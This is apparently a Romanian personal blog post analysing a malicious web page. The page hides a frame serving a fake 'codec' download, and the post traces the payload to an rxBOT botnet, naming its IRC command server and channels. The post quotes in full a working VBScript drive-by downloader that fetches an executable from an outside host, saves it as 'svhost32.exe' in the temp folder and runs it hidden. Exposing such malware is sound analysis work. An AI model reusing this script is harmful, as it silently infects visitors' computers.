M-am trezit destul de repede azi , în jur de ora 5 dimineaţa deşi eram foarte obosit , în fine ,după o porţie de cireşe mâncate la geam ( era prea frumos afară ,fulgera prea ok să nu văd ) am găsit ceva şi mai interesant decât asta.

Poza aparţine lui Flubber cel care a făcut acest post pe RSTcenter.com.Bun,până aici nimic ciudat ,o poză cu un comentariu şi un link însă sursa paginii respective conţine asta :

<frame src=”http://www.ramona4u.go.ro” name=”dot_tk_frame_content” scrolling=”auto” noresize>

care arată aşa :

şi conţine o bucată interesantă de VBscript  :

on error resume next
dl = “http://www.ramona4u.go.ro/vlc-codec.exe”
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”svhost32.exe”
set F = df.createobject(“Scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(“Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0

Se pare că pentru a “vizualiza” avem nevoie de codec 😀 vlc-codec.exe care defapt este asta :

http://www.virustotal.com/analisis/14d31eea019036ebb25900de024c1e720c4a17764583fcab4ff0c026ef021435-1276477571

Cum a precizat şi zYztem este vorba despre un amărât de rxBOT fără să fie crypt fără nimic.
Se pare că botnetul nostru primeşte “ordine” de aici :
irc.hyvehost.com pe canalul #mybotnet ( văd că este şi #myzombies pe acolo )

Am fost şi eu curios să vad dacă totuşi poate cineva deveni o victimă a aşa ceva din moment ce este depistat aşa de uşor de antivirus ( aproape oricare ) şi am fost surprins .

Aruncaţi un ochi şi asupra topicului de pe #mybotnet

Mai multe despre rxBOT aici : www.cs.sjsu.edu/faculty/stamp/students/Esha_Patil_CS299Report.pdf

Ehh , este romanul “hacer” sau nu ?